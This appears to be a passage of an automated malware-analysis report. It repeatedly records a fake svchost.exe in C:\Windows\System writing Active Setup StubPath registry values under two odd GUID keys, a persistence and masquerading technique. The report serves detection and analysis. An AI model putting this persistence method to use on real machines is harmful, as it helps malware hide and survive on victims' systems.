                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
